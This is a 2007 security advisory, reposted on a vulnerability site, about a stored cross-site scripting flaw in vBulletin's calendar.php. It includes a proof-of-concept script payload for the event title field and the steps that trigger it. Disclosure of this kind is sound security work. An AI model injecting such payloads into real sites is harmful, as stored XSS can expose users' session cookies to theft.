Computer Security

Security Advisory: vbulletin < 3.6.6 [permanent xss]
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Jetbox CMS version 2.1 E-Mail Injection Vulnerability

From:laurent.gaffie_(at)_none.com <laurent.gaffie_(at)_none.com>
Date:17.05.2007
Subject:vbulletin < 3.6.6 [permanent xss]

vendor site:http://www.vbulletin.com/
product:vbulletin < 3.6.6
bug: permanent xss
affected file: calendar.php
risk : medium

xss permanent ( must be loggued ) PoC :
http://127.0.0.1/vbulletin/calendar.php?do=add&type=single&c=1
--> fill up the title field with :
</title><script>alert(document.cookie)</script>

Event Date : ( some far away date ... like 2010 for exemple )
message : whatever .

when it's done look at the :"Request Reminder for this Event" link.
(it looks like this: http://127.0.0.1/vbulletin/calendar.php?do=addreminder&e=2)
if you click,your XSS will be executed .


reminder:
permanent xss are dangerous ...
see : http://en.wikipedia.org/wiki/Cross_site_scripting

regards laurent gaffiŠ¹
contact: laurent.gaffie[at]g/**/m/**/a/**/i/**/l.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru